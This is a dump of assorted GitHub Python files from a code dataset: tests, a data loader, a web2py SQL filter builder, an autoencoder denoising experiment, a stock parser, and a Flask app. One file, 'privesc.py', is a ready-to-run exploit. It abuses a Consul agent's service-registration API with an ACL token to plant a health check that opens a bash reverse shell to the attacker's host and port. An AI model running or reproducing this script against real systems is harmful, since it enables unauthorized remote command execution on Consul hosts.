seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
2403860193 | from decimal import Decimal
from django.test import TestCase
from parameterized import parameterized
from calculator.calculation import calculate_total_cost
from calculator.exceptions import StateNotFound
from calculator.repository import Repository
from calculator.tests.common import fill_db
class CalculateTotalCostTestCase(TestCase):
    """Tests for calculate_total_cost."""

    def setUp(self):
        """Populate the test database with fixture data."""
        fill_db()

    @parameterized.expand(
        [
            # (price, quantity, state_code, expected total incl. state tax)
            (Decimal(1), 1, 'UT', Decimal('1.0685')),
            (Decimal(1000), 1, 'NV', Decimal('1047.6')),
            (Decimal(1), 1000, 'TX', Decimal('1030.625')),
            (Decimal(200), 100, 'AL', Decimal('18720')),
            (Decimal('123.33'), 175, 'CA', Decimal('21026.9941875')),
        ],
    )
    def test_calculate_total_cost(self, price, quantity, state_code, expected):
        """Successful total-cost calculations for several states."""
        repository = Repository()
        self.assertEqual(
            calculate_total_cost(
                price=price,
                quantity=quantity,
                state_code=state_code,
                repository=repository,
            ),
            expected,
        )

    def test_bad_state_code(self):
        """An unknown state code must raise StateNotFound."""
        repository = Repository()
        with self.assertRaises(StateNotFound):
            calculate_total_cost(
                price=Decimal('11.33'),
                quantity=12,
                state_code='WRONG',
                repository=repository,
            )
| SpiritD/tax_calculator | tom_project/calculator/tests/total_costs.py | total_costs.py | py | 1,659 | python | en | code | 0 | github-code | 36 |
37402409097 | from regression_tests import *
class Test(Test):
    """Regression test: fileinfo must not crash (bad-alloc) on this malformed
    Mach-O sample, and must omit the import table from its verbose JSON output."""

    # The `Test` base class comes from the `regression_tests` star-import above;
    # shadowing the name is this framework's convention.
    settings=TestSettings(
        tool='fileinfo',
        args='--json --verbose',
        input='564ee59caad056d98ed274c8c4f06e82'
    )

    def test_fileinfo_succeeded(self):
        assert self.fileinfo.succeeded
        # Regression check: the broken import table must not be reported.
        assert 'importTable' not in self.fileinfo.output
| avast/retdec-regression-tests | tools/fileinfo/bugs/macho-bad-alloc-2/test.py | test.py | py | 326 | python | en | code | 11 | github-code | 36 |
class Student:
    """Plain data holder for one student record.

    All attributes are stored with a single leading underscore
    (non-public by convention).
    """

    def __init__(self, id, fullname, birthdate, sex, address, phone, email):
        # NOTE: `id` shadows the builtin, but the parameter name is kept for
        # backward compatibility with keyword callers.
        self._id = id
        self._fullname = fullname
        self._birthdate = birthdate
        self._sex = sex
        self._address = address
        self._phone = phone
        self._email = email

    def __repr__(self):
        """Unambiguous representation for debugging/logging."""
        return (
            f"{type(self).__name__}(id={self._id!r}, fullname={self._fullname!r}, "
            f"birthdate={self._birthdate!r}, sex={self._sex!r}, "
            f"address={self._address!r}, phone={self._phone!r}, "
            f"email={self._email!r})"
        )
| thanhtugn/python_core_thanhtugn | Big_assignment_01/student.py | student.py | py | 302 | python | en | code | 1 | github-code | 36 |
35104869337 | # -*- coding: utf-8 -*-
import os
import codecs
import collections
from six.moves import cPickle
import numpy as np
import re
import itertools
import pandas as pd
from ts_FeatureCoding import Feature_Coding
DATA_DIR = "data/events"
class DataLoader():
    """Load the events CSV, feature-encode it and serve (x, y) mini-batches."""

    def __init__(self, args):
        """Stash configuration from *args* and immediately read the CSV."""
        self.data_dir = args.data_dir
        self.data_file = args.data_file
        self.batch_size = args.batch_size
        self.seq_length = args.seq_length
        self.max_records = args.max_records    # >0 caps the number of rows read in loadcsv()
        self.encoding=args.input_encoding      # forwarded to preprocess(), which ignores it
        self.featureCodes = Feature_Coding()
        self.nfeatures = self.featureCodes.nfeatures   # overwritten later by loadcsv()

        input_file = os.path.join(self.data_dir, self.data_file)
        print("reading text file")
        self.loadcsv(input_file)
def preparedata(self):
    """Build vocabulary/tensor files (always rebuilt), then create batches."""
    vocab_file = os.path.join(self.data_dir, "vocab.pkl")
    tensor_file = os.path.join(self.data_dir, "data.npy")
    # Let's not read vocab and data from file. We may change them.
    # (The `True or` below intentionally forces the rebuild branch; the
    # cached-load branch is currently unreachable.)
    if True or not (os.path.exists(vocab_file) and os.path.exists(tensor_file)):
        print("building vocabulary files...")
        self.preprocess(vocab_file, tensor_file, self.encoding)
    else:
        print("loading preprocessed files...")
        self.load_preprocessed(vocab_file, tensor_file)
    self.create_batches()
    self.reset_batch_pointer()
def clean_str(self, string):
    """
    Tokenization/string cleaning for all datasets except for SST.
    Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data

    Collapses the literal event pair "VS_15,Neutral" into a sentence
    separator '.' and rewrites every remaining comma to '_'.
    """
    # Fix: the "VS_15,Neutral" substitution must run *before* commas are
    # rewritten to underscores -- its pattern contains a comma and could
    # never match after the comma pass.  The replacement is a literal '.'
    # (the old "\." produced the two characters backslash-dot).
    string = re.sub(r"VS_15,Neutral", ".", string)
    string = re.sub(r",", "_", string)
    return string
def build_vocab(self, sentences):
    """
    Builds a vocabulary mapping from word to index based on the sentences.
    Returns vocabulary mapping and inverse vocabulary mapping.
    """
    # Count tokens, then order the unique tokens alphabetically; the index of
    # each token in that ordering becomes its vocabulary id.
    token_counts = collections.Counter(sentences)
    inverse_vocabulary = sorted(token for token, _ in token_counts.most_common())
    vocabulary = {token: index for index, token in enumerate(inverse_vocabulary)}
    return [vocabulary, inverse_vocabulary]
def loadcsv(self, input_file):
    """Read the raw events CSV in chunks into self.raw_df, prune unwanted
    event types, and build the one-hot feature frame self.data plus the
    next-event labels self.labels."""
    columns= self.featureCodes.featuresAll
    nread = 100000          # rows per read_csv chunk
    skip_rows = 0
    max_records = self.max_records    # <=0 appears to mean "no limit" -- TODO confirm
    self.raw_df = pd.DataFrame(columns=columns)
    reader = pd.read_csv(input_file, iterator=True, chunksize=nread,
                         header=0, names=columns, index_col=False,
                         na_values='NA', skip_blank_lines=True,
                         skipinitialspace=True, infer_datetime_format=False,
                         parse_dates=False, skiprows=skip_rows)
    # NOTE(review): `do_more` is never read; the loop exits via `break`, and
    # the assignments inside it use the misspelled name `doMore`.
    do_more = True
    total_read = 0
    dailyRowSeen = False    # NOTE(review): unused
    for csvrows in reader:
        if csvrows.shape[0] == 0:
            doMore = False
            break
        # convert TimeStamp column to a datatime
        csvrows['TimeStamp'] = pd.to_datetime(csvrows['TimeStamp'], format='%Y/%m/%dT%H:%M:%S')
        # raw_df = raw_df.append(csvrows, ignore_index=True)
        self.raw_df = pd.concat([self.raw_df, csvrows], axis=0, copy=False, ignore_index=True)
        skip_rows += nread
        total_read += nread
        print('Records read:', total_read, self.raw_df.shape)
        if max_records > 0 and total_read >= max_records:
            doMore = False
            break
    print('Total Records read:', total_read, ' Saved:', self.raw_df.shape)
    self.raw_df.columns = columns
    # NOTE(review): result discarded -- set_index returns a new frame unless
    # inplace=True is passed; the index is therefore never actually set.
    self.raw_df.set_index('TimeStamp')
    """
    # extract the event TypeCode
    self.raw_df['TypeCode'] = self.raw_df['Type'].str.split('_').str[0]
    # extract the Direction code
    self.raw_df['Dir'] = self.raw_df['TypeCode'].str[-1:]
    self.raw_df['Period'] = self.raw_df['Type'].str.split('_').str[1]
    # map the Period (D,60,15,5,1) to int PeriodCode (1440,60,15,5,1)
    try:
        self.raw_df['TypeCodeNum'] = self.raw_df['TypeCode'].map(self.featureCodes.eventCodeDict).astype('int32')
        self.raw_df['PeriodCode'] = self.raw_df['Period'].map(self.featureCodes.periodCodeDict).astype('int32')
    except RuntimeError as e:
        print( e.args)
    """
    print('Checking for Nan rows...')
    nandf = self.raw_df[self.raw_df.isnull().any(axis=1)]
    if not nandf.empty:
        print(nandf)
    # For VS events, set direction code to X, since the direction is unknown
    #self.raw_df.Dir[self.raw_df[self.raw_df.TypeCode == 'VS'].index] = 'X'
    # drop rows with unwanted type codes (HEARTB)
    print('Pruning unwanted event types...')
    self.raw_df = self.raw_df.drop(self.raw_df[self.raw_df.EventCode == 'HEARTB'].index)
    self.raw_df = self.raw_df.drop(self.raw_df[self.raw_df.EventCode == 'VSX'].index)
    self.raw_df.reset_index()    # NOTE(review): result discarded (not inplace)
    print('Total Records after pruning:', self.raw_df.shape)
    # One-hot encode the categorical columns; keep the raw Type string alongside.
    categ_features = pd.get_dummies(self.raw_df[['PeriodCode', 'EventDir', 'MarketTrend_D', 'MarketTrend_60', 'MarketTrend_15', 'MarketTrend_5', 'MarketTrend_1']], drop_first=False)
    self.data = pd.concat([self.raw_df.Type, categ_features], axis=1)
    #self.data = self.raw_df[['Type']]
    #self.data = np.array(self.raw_df.Type)
    #self.data['X'] = '{' + self.data['PeriodCode'] + ' ' + self.data['Dir'] + ' ' + self.data['TypeCode'] + '}'
    #labels = dftrim['Dir'] + '_' + dftrim['Period']
    # The label for row i is the *next* event's Type (one-step shift).
    self.labels = self.data.Type[1:]
    self.data = self.data[:-1]
    #all_data = pd.concat([data, labels], axis=0)
    #self.data.reset_index()
    self.nfeatures = self.data.shape[1]
    # scan for first row containing 'HIL*D' event code
    # (drop everything before the first daily HILMF../HILFT.. event)
    for idx in range(len(self.raw_df)):
        t = self.raw_df.Type.iloc[idx]
        mf = re.match(r'HILMF..D', t)
        ft = re.match(r'HILFT..D', t)
        if mf or ft:
            print('Found ', t, ' at index', idx)
            self.data=self.data[idx:]
            self.labels = self.labels[idx:]
            break
def preprocess(self, vocab_file, tensor_file, encoding):
    """Build the vocabulary from self.data.Type, replace the Type strings
    with their vocabulary indices, and persist the vocabulary (pickle) and
    the resulting feature tensor (.npy).

    NOTE(review): the `encoding` parameter is accepted but never used.
    """
    #X = '[ ' + self.data.PeriodCode.astype(str) + ' ' + self.data.Dir + ' ' + self.data.TypeCode + ' ]'
    # save the data in a numpy file
    #self.tensor = np.array(self.data)
    #self.label_tensor = np.array(self.labels)
    #np.save(tensor_file, self.tensor)
    #self.vocab_size = len(self.featureCodes.eventCodeDict)
    self.vocab, self.words = self.build_vocab(self.data.Type)
    self.vocab_size = len(self.words)
    with open(vocab_file, 'wb') as f:
        cPickle.dump(self.words, f)
    #The same operation like this [self.vocab[word] for word in x_text]
    # index of words as our basic data
    self.data['Type'] = np.array(list(map(self.vocab.get, self.data.Type)))
    self.tensor = np.array(self.data)
    self.label_tensor = np.array(list(map(self.vocab.get, self.labels)))
    # Save the data to data.npy
    np.save(tensor_file, self.tensor)
def load_preprocessed(self, vocab_file, tensor_file):
    """Restore the vocabulary and tensor previously saved by preprocess()."""
    with open(vocab_file, 'rb') as f:
        self.words = cPickle.load(f)
    self.vocab_size = len(self.words)
    self.vocab = dict(zip(self.words, range(len(self.words))))
    self.tensor = np.load(tensor_file)
    # NOTE(review): this uses tensor.size (total element count), while
    # create_batches() uses tensor.shape[0]; for 2-D tensors these disagree
    # -- confirm which is intended.
    self.num_batches = int(self.tensor.size / (self.batch_size *
                                               self.seq_length))
def create_batches(self):
self.num_batches = int(self.tensor.shape[0] / (self.batch_size * self.seq_length))
if self.num_batches == 0:
assert False, "Not enough data. Make seq_length and batch_size smaller."
# truncate input tensor shape [n, self.nfeatures] to even number of full batches
self.tensor = self.tensor[:self.num_batches * self.batch_size * self.seq_length]
self.label_tensor = self.label_tensor[:self.num_batches * self.batch_size * self.seq_length]
self.x_batches = np.split(self.tensor.reshape((-1, self.seq_length, self.nfeatures)),
self.num_batches, axis=0)
self.y_batches = np.split(self.label_tensor.reshape(-1, self.seq_length),
self.num_batches, axis=0)
def next_batch(self):
x, y = self.x_batches[self.pointer], self.y_batches[self.pointer]
self.pointer += 1
return x, y
def reset_batch_pointer(self):
self.pointer = 0
| traderscience/market_transformer | tsutils/data_loader.py | data_loader.py | py | 9,544 | python | en | code | 0 | github-code | 36 |
# Accepted spellings of boolean "true" coming in from filters / the UI layer.
TRUE_VALUES = (
    'T', 't', "true", "True", True,
    "yes", "Yes", "YES", "Y", "y",
)
def q_filter(query=None, svc_field=None, node_field=None, group_field=None,
             app_field=None, user_field=None, db=db):
    """Restrict *query* to rows visible to the currently authenticated
    identity (user, node or service).

    Pass the relevant pyDAL field(s); a belongs()/equality restriction is
    built from the identity's scope.  Non-node identities in the "Manager"
    group bypass the per-user restrictions.

    NOTE(review): `db=db` captures the module-level web2py `db` object at
    definition time, and a later group/user restriction overwrites (rather
    than combines with) an earlier svc/node/app restriction in `q` --
    confirm that is intended.
    """
    q = None
    t = None
    if not auth_is_node() and "Manager" in user_groups():
        manager = True
    else:
        manager = False
    if svc_field:
        if auth_is_svc():
            # Service identity: only its own service.
            q = svc_field == auth.user.svc_id
        elif auth_is_node():
            # Node identity: services hosted on this node, plus services whose
            # monitored VM name matches this node within the same app.
            node_svc_ids = [r.svc_id for r in db(db.svcmon.node_id==auth.user.node_id).select()]
            app = db(db.nodes.node_id==auth.user.node_id).select().first().app
            node_svc_ids += [r.svc_id for r in db((db.svcmon.mon_vmname==auth.user.nodename)&(db.services.svc_app==app)&(db.svcmon.svc_id==db.services.svc_id)).select(db.services.svc_id)]
            q = svc_field.belongs(node_svc_ids)
        elif not manager:
            q = svc_field.belongs(user_published_services())
        if t is None:
            t = db[svc_field.tablename]
    elif node_field:
        if auth_is_node():
            q = node_field == auth.user.node_id
        elif not manager:
            q = node_field.belongs(user_published_nodes())
        if t is None:
            t = db[node_field.tablename]
    elif app_field:
        if auth_is_node():
            node_apps = node_responsibles_apps(auth.user.node_id)
            q = app_field.belongs(node_apps)
        elif not manager:
            q = app_field.belongs(user_published_apps())
        if t is None:
            t = db[app_field.tablename]
    if group_field:
        if auth_is_node() or auth_is_svc():
            pass
        elif not manager:
            q = group_field.belongs(user_groups())
        if t is None:
            t = db[group_field.tablename]
    if user_field:
        if auth_is_node() or auth_is_svc():
            pass
        elif not manager:
            q = user_field.belongs(user_groups_user_ids())
        if t is None:
            t = db[user_field.tablename]
    if query is None:
        if q is None:
            # No restriction applies: match everything in the last table seen.
            return t.id > 0
        else:
            return q
    else:
        if q is None:
            return query
        else:
            return query & q
def where_json_chunk(table, field, chunk, db):
    """Translate one JSON-path filter chunk into a pyDAL query on a JSON
    column.  Supported forms: ``$.a.b>=3`` (comparison), ``$.a[#]=2`` (array
    length), ``$.a:has:x`` (JSON_SEARCH), ``$.a:sub:x`` (contains),
    ``$.a:start:x`` / ``$.a:end:x`` (prefix/suffix).

    Returns None when *chunk* matches no supported operator.

    NOTE(review): key and value are interpolated directly into the raw SQL
    fragment -- this relies on upstream sanitisation of *chunk* (otherwise
    an injection risk).
    """
    q = None
    m = re.match("([\w\.$\[\*#\]]*)(>=|<=|[=><])(.*)", chunk)
    if m:
        key, op, val = m.groups()
        try:
            int(val)
        except ValueError:
            # Non-numeric values must be quoted in the SQL fragment.
            val = "'%s'"%val
        if "[#]" in key:
            # "[#]" requests the array length at that path.
            q = (db[table][field] != None) & "JSON_LENGTH(%s.%s, '%s')%s%s" % (table, field, key.replace("[#]",""), op, val)
        else:
            q = (db[table][field] != None) & "JSON_VALUE(%s.%s, '%s')%s%s" % (table, field, key, op, val)
    elif ":has:" in chunk:
        m = re.match("([\w\.$]*)(:has:)(.*)", chunk)
        key, op, val = m.groups()
        try:
            int(val)
        except ValueError:
            val = "'%s'"%val
        q = (db[table][field] != None) & "NOT JSON_SEARCH(%s.%s, 'one', %s, NULL, '%s') is NULL" % (table, field, val, key)
    elif ":sub:" in chunk:
        m = re.match("([\w\.$]*)(:sub:)(.*)", chunk)
        key, op, val = m.groups()
        q = (db[table][field] != None) & "JSON_VALUE(%s.%s, '%s') LIKE '%%%s%%'" % (table, field, key, val)
    elif ":end:" in chunk:
        m = re.match("([\w\.$]*)(:end:)(.*)", chunk)
        key, op, val = m.groups()
        q = (db[table][field] != None) & "JSON_VALUE(%s.%s, '%s') LIKE '%%%s'" % (table, field, key, val)
    elif ":start:" in chunk:
        m = re.match("([\w\.$]*)(:start:)(.*)", chunk)
        key, op, val = m.groups()
        q = (db[table][field] != None) & "JSON_VALUE(%s.%s, '%s') LIKE '%s%%'" % (table, field, key, val)
    return q
def _where(query, table, var, field, depth=0, db=db):
    """Recursively AND/OR user-supplied filter chunks from *var* onto *query*.

    *var* is a filter string of chunks separated by '&' (AND) or '|' (OR);
    a leading '!' negates a chunk.  Chunk forms: JSON paths ($...), 'empty',
    '(a,b,c)' IN-lists, plain values (LIKE when they contain '%'), and
    <, >, = comparisons.  Each call consumes one chunk and recurses on the
    remainder.
    """
    if table not in db:
        return query
    if field not in db[table]:
        return query
    # A leading '|' on the outermost call would OR against a None query;
    # strip it and seed a match-all query instead.
    if depth == 0 and var and len(var) > 0 and var[0] == "|":
        var = var[1:]
        if query is None:
            query = (db[table].id >= 0)
    if var is None:
        return query
    if len(var) == 0:
        return query
    if var == "%":
        return query
    if '&' in var and '|' in var:
        """don't even try to guess order
        """
        return query
    done = False
    # How does this chunk combine with the accumulated query?
    if var[0] == '|':
        _or=True
        var = var[1:]
    elif var[0] == '&':
        _or=False
        var = var[1:]
    else:
        _or=False
    # Split off the first chunk; the remainder is handled by recursion below.
    if '&' in var:
        i = var.index('&')
        chunk = var[:i]
        var = var[i:]
    elif '|' in var:
        i = var.index('|')
        chunk = var[:i]
        var = var[i:]
    else:
        done = True
        chunk = var
    if len(chunk) == 0:
        return query
    if chunk[0] == '!':
        _not = True
        chunk = chunk[1:]
    else:
        _not = False
    if len(chunk) == 0:
        return query
    # initialize a restrictive filter
    q = db[table].id < 0
    if chunk[0] == "$":
        # JSON-path chunk: delegate to where_json_chunk().
        _q = where_json_chunk(table, field, chunk, db)
        if _q:
            q = _q
    elif chunk in ('empty', '=empty'):
        # NULL (or empty string for string columns).
        if db[table][field].type == "string":
            q = (db[table][field]==None)|(db[table][field]=='')
        else:
            q = db[table][field]==None
    elif chunk[0] == '(' and chunk[-1] == ')' and len(chunk) > 2:
        # "(a,b,c)" -> IN list.
        chunk = chunk[1:-1]
        if field not in db[table]:
            pass
        q = db[table][field].belongs(chunk.split(','))
    elif chunk[0] not in '<>=':
        # Plain value: LIKE when it contains '%', otherwise typed equality.
        if chunk[0] == "~":
            chunk = chunk[1:]
        if field not in db[table]:
            pass
        elif db[table][field].type in ('string', 'text', 'date', 'upload'):
            if '%' in chunk:
                q = db[table][field].like(chunk)
            else:
                q = db[table][field]==chunk
        elif db[table][field].type in ('id', 'integer'):
            try:
                c = int(chunk)
                q = db[table][field]==c
            except ValueError:
                pass
        elif db[table][field].type == 'float':
            try:
                c = float(chunk)
                q = db[table][field]==c
            except ValueError:
                pass
        elif db[table][field].type == 'boolean':
            if chunk in TRUE_VALUES:
                q = db[table][field]==True
            elif chunk == "%":
                q = db[table].id >= 0
            else:
                q = db[table][field]==False
    else:
        # Comparison chunk: '<val', '>val' or '=val'.
        _op = chunk[0]
        if len(chunk) == 0:
            return query
        chunk = chunk[1:]
        q = None
        if field not in db[table]:
            pass
        elif db[table][field].type in ('datetime', 'timestamp', 'date'):
            # Allow relative date expressions (resolved by delta_to_date).
            chunk = delta_to_date(chunk)
        elif db[table][field].type in ('id', 'integer'):
            try:
                chunk = int(chunk)
            except ValueError:
                q = db[table].id < 0
        if q is None:
            if _op == '>':
                q = db[table][field]>chunk
            elif _op == '<':
                q = db[table][field]<chunk
            elif _op == '=':
                q = db[table][field]==chunk
    if _not:
        q = ~q
    # Recurse on the remaining chunks, then merge with the accumulated query.
    if not done:
        q = _where(q, table, var, field, depth=depth+1)
    if _or:
        return query|q
    else:
        return query&q
def table_where(query, table, field):
    """Apply the column's parsed filter expression to *query* via _where()."""
    colprop = table.colprops[field]
    if colprop.filter_redirect is None:
        target_field = colprop.field
    else:
        target_field = colprop.filter_redirect
    return _where(query, colprop.table, table.filter_parse(field), target_field)
| opensvc/collector | init/models/where.py | where.py | py | 7,675 | python | en | code | 0 | github-code | 36 |
5468407661 | import os
import numpy as np
import torch
import torchvision
import torch.nn as nn
import torchvision.transforms as transforms
import torch.optim as optim
import matplotlib.pyplot as plt
import torch.nn.functional as F
from torchvision import datasets
from torch.utils.data import DataLoader
from torchvision.utils import save_image
from PIL import Image
import pylab as py
from IPython import embed
from naive_ae import ConvAutoencoder
DATA_PATH = '../data_sets/mnist'
NAIVE_AE_PATH = './trained_models/convAutoEncSigmoid/naive_ae25.pth'
CLEVER_AE_PATH = './trained_models/convAutoEncNoSigmoid/naive_ae25.pth'
def posterior_loss_denoising(I, I_c, AE, sigma, T):
    """Negative log posterior for MAP denoising.

    - likelihood term: Gaussian noise model exp(-||I - I_c||) / (2*sigma^2)
    - prior term: autoencoder reconstruction distance ||AE(I_c) - I|| / T

    Returns -log(likelihood) - log(prior) as a scalar tensor.
    """
    # Fix: the Gaussian normaliser 2*sigma^2 belongs in the denominator.
    # The old expression `... / 2 * (sigma**2)` divided by 2 and then
    # *multiplied* by sigma**2 because of operator precedence.
    likelihood_term = torch.exp(-torch.norm(I - I_c)) / (2 * (sigma ** 2))
    prior_term = torch.norm(AE(I_c) - I) / T
    # print(f'likelyhood_term:{likelihood_term} prior_term:{prior_term}')
    return -torch.log(likelihood_term) - torch.log(prior_term)
def maximize_posterior_denoising(I_c, AE, sigma=1, T=0.1):
    """MAP estimate of the clean image: gradient descent on the negative log
    posterior, starting from a uniformly random 28x28 image."""
    estimate = torch.rand(1, 1, 28, 28, requires_grad=True)
    optimizer = torch.optim.Adam([estimate], lr=0.1)
    for _ in range(2000):
        loss = posterior_loss_denoising(estimate, I_c, AE, sigma, T)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
    return estimate
def posterior_loss_mid_suppression(I, I_c, AE, T):
    """Negative log prior term used for the inpainting task (no likelihood term)."""
    # I = suppress_mid(I)   # disabled in the original implementation
    reconstruction_distance = torch.norm(AE(I_c) - I)
    return -torch.log(reconstruction_distance / T)
def maximize_posterior_mid_suppression(I_c, AE, sigma=1, T=100):
    """MAP inpainting: minimise the prior-only loss starting from random noise.
    (`sigma` is accepted for interface parity but unused by the loss.)"""
    estimate = torch.rand(1, 1, 28, 28, requires_grad=True)
    optimizer = torch.optim.Adam([estimate], lr=0.1)
    for _ in range(2000):
        loss = posterior_loss_mid_suppression(estimate, I_c, AE, T)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
    return estimate
def gaussian_noise(I):
    """Return I corrupted with unit-variance Gaussian noise (broadcast to 1x1x28x28)."""
    noise = torch.randn(1, 1, 28, 28)
    return I + noise
def suppress_mid(I):
    """Return a copy of I with the central 9x9 patch (rows/cols 9..17) zeroed.
    The input tensor is left unmodified."""
    masked = torch.clone(I)
    masked[:, :, 9:18, 9:18] = 0
    return masked
# Load the two pretrained convolutional autoencoders being compared
# ("naive" = trained with sigmoid output, "clever" = without; see the paths above).
naive_ae = ConvAutoencoder()
naive_ae.load_state_dict(torch.load(NAIVE_AE_PATH))
clever_ae = ConvAutoencoder()
clever_ae.load_state_dict(torch.load(CLEVER_AE_PATH))

# MNIST test set, normalised to roughly [-1, 1].
transform = transforms.Compose([
    transforms.ToTensor(),
    transforms.Normalize((0.5,), (0.5,))
])
test_set = datasets.MNIST(root=DATA_PATH, train=False, download=True, transform=transform)

############################
#      denoising task      #
############################
# Corrupt a sample digit with Gaussian noise, then MAP-denoise it with each AE prior.
I = test_set[2][0]
I_c = gaussian_noise(I)
naive_denoising = maximize_posterior_denoising(I_c, naive_ae)
clever_denoising = maximize_posterior_denoising(I_c, clever_ae)

fig, ax = plt.subplots(2,2)
fig.suptitle('denoising task')
ax[0,0].imshow(I.squeeze())
ax[0,0].set_title('original image')
ax[0,1].imshow(I_c.squeeze())
ax[0,1].set_title('noised image')
ax[1,0].imshow(naive_denoising.detach().squeeze())
ax[1,0].set_title('naive AE denoising')
ax[1,1].imshow(clever_denoising.detach().squeeze())
ax[1,1].set_title('clever AE denoising')

############################
#      inpainting task     #
############################
# Zero out the central patch and reconstruct it using the AE prior only.
I = test_set[2][0].view(1,1,28,28)
I_c = suppress_mid(I)
naive_inpainting = maximize_posterior_mid_suppression(I_c, naive_ae)
clever_inpainting = maximize_posterior_mid_suppression(I_c, clever_ae)

fig, ax = plt.subplots(2,2)
fig.suptitle('inpainting task')
ax[0,0].imshow(I.squeeze())
ax[0,0].set_title('original image')
ax[0,1].imshow(I_c.squeeze())
ax[0,1].set_title('noised image')
ax[1,0].imshow(naive_inpainting.detach().squeeze())
ax[1,0].set_title('naive AE inpainting')
ax[1,1].imshow(clever_inpainting.detach().squeeze())
ax[1,1].set_title('clever AE inpainting')

plt.show()
21056220601 | #!/usr/bin/python3
import requests, argparse
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", "-rh", type=str, help="remote host (if not specified, 127.0.0.1 will be used)", default="127.0.0.1")
parser.add_argument("--rport", "-rp", type=str, help="remote port (if not specified, 8500 will be used)", default="8500")
parser.add_argument("--lhost", "-lh", type=str, help="local host", required=True)
parser.add_argument("--lport", "-lp", type=str, help="local port", required=True)
parser.add_argument("--token", "-tk", type=str, help="acl token", required=True)
parser.add_argument("--ssl", "-s", action="store_true", help="use ssl (https) in the request")
args = parser.parse_args()
if args.ssl:
target = f"https://{args.rhost}:{args.rport}/v1/agent/service/register"
else:
target = f"http://{args.rhost}:{args.rport}/v1/agent/service/register"
headers = {"X-Consul-Token": f"{args.token}"}
json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}
try:
requests.put(target, headers=headers, json=json, verify=False)
print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
except:
print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
exit(1)
| GatoGamer1155/Scripts | Ambassador/privesc.py | privesc.py | py | 1,409 | python | en | code | 33 | github-code | 36 |
27609918869 | # -*- coding: utf-8 -*-
"""
Created on Thu May 27 19:43:26 2021
@author: estusaee2
"""
"""
i = 1
while i <= 20:
print(i,end=", ")
i = i + 1
"""
decision = 1
# Keep showing the menu while the user answers 1 ("No"); any other number
# (e.g. 2, "Si") ends the loop.  Non-numeric input raises ValueError.
while decision == 1 :
    decision = int(input("¿Desea terminar el programa\n 1: No \n 2: Si \n\n "))
| Y-Avila/MisionTic-2022 | Ciclo_1(Python)/2Semana/While.py | While.py | py | 282 | python | en | code | 0 | github-code | 36 |
6765119466 | from operator import itemgetter
def carregar(arquivo):
    """Parse the quotes CSV (skipping the header row) into a list of dicts
    with integer date/volume fields and float price fields."""
    registros = []
    with open(arquivo) as handle:
        handle.readline()  # discard header row
        for registro in handle.readlines():
            data, abertura, alta, baixa, fechamento, volume = registro.strip().split(',')
            ano, mes, dia = data.split('-')
            registros.append({
                "ano": int(ano),
                "mes": int(mes),
                "dia": int(dia),
                "abertura": float(abertura),
                "alta": float(alta),
                "baixa": float(baixa),
                "fechamento": float(fechamento),
                "volume": int(volume),
            })
    return registros
def formatar_data(linha):
    """Format a quote row as 'DD de <month name> de YYYY' (Portuguese)."""
    meses = (
        'janeiro', 'fevereiro', 'março', 'abril', 'maio', 'junho',
        'julho', 'agosto', 'setembro', 'outubro', 'novembro', 'dezembro')
    # Day is zero-padded to two digits; month index is 1-based in the data.
    return '{:0>2} de {} de {}'.format(linha['dia'], meses[linha['mes'] - 1], linha['ano'])
def menor_fechamento(linha):
    """Return (lowest closing price, formatted date of that close).

    Uses min() instead of sorting the whole list (O(n) vs O(n log n));
    ties resolve to the first occurrence, matching the stable sort of the
    original implementation.
    """
    menor = min(linha, key=itemgetter('fechamento'))
    return menor['fechamento'], formatar_data(menor)
def main():
    """Read a CSV filename from stdin and print the lowest closing price."""
    nome_arquivo = input().replace('\r', '')  # strip a stray carriage return
    fecha, data = menor_fechamento(carregar(nome_arquivo))
    print(f'O menor preço no fechamento foi {fecha:.2f} em {data}')


if __name__ == '__main__':
    main()
74004428583 | from flask import Flask, jsonify
from apscheduler.schedulers.background import BackgroundScheduler
app = Flask(__name__)
# Sample data -- placeholder values, not accurate.
cancer_stats = {
    'Total_infected': 1000,
    'Active_cases': 500,
    'Recovered': 400,
    'Deaths': 200,
    'Critical': 50,
    'Mortality_rate': 20,   # NOTE(review): presumably a percentage -- confirm
    'deceased': 100,
    'Population': 1000000
}
def update_stats():
    """Bump every statistic by 10 (placeholder refresh logic, run by the scheduler)."""
    for stat_name in ('Total_infected', 'Active_cases', 'Recovered', 'Deaths',
                      'Critical', 'Mortality_rate', 'deceased', 'Population'):
        cancer_stats[stat_name] += 10
def get_cancer_stats():
    # NOTE(review): this view is never registered with Flask (no @app.route
    # decorator anywhere), and jsonify() requires an application context --
    # confirm how this function is meant to be exposed.
    return jsonify(cancer_stats)
if __name__ == '__main__':
    # Refresh the (sample) statistics every minute in a background thread,
    # then start the Flask development server.
    scheduler = BackgroundScheduler()
    scheduler.add_job(update_stats, 'interval', minutes=1)
    scheduler.start()
    print('Scheduler started')
    scheduler.print_jobs()
    app.run(debug=True)
| Ceced20/SimpleCancerAPI | API.py | API.py | py | 955 | python | en | code | 0 | github-code | 36 |
6672970825 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""``stsynphot`` configurable items.
The default configuration heavily depends on STScI TRDS structure
but it can be easily re-configured as the user wishes via
`astropy.config`.
``PYSYN_CDBS`` must be a defined system environment variable for
directories to be configured properly. It also overwrites
``synphot`` configurable items.
"""
# STDLIB
import os
# THIRD-PARTY
import numpy as np
from astropy import log
from astropy.config import ConfigNamespace, ConfigItem
# SYNPHOT
from synphot.config import Conf as synconf
from synphot.utils import generate_wavelengths
__all__ = ['conf', 'getref', 'showref', 'overwrite_synphot_config']
